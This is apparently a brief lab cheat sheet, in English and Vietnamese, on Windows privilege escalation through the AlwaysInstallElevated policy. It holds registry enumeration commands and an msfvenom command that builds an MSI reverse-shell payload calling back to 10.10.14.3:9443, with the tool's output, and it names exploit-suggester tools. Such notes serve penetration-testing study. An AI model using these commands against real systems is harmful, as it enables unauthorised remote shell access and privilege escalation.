Others Techniques
Abuse Always Install Elevated Settings
Enum
PS C:\htb> reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1hoặc
PS C:\htb> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1Tạo MSI package để exploit
endy21@htb[/htb]$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of msi file: 159744 bytesThực thi
Exploit suggester
Windows desktop
Với Window Desktop có thể chay windows-exploit-suggester.py để auto recon
Cài dependencies
Lấy thông tin hệ thống
Chạy tool
Windows Server
Với Windown Server có thể chạy Sherlock.ps1 để check
Last updated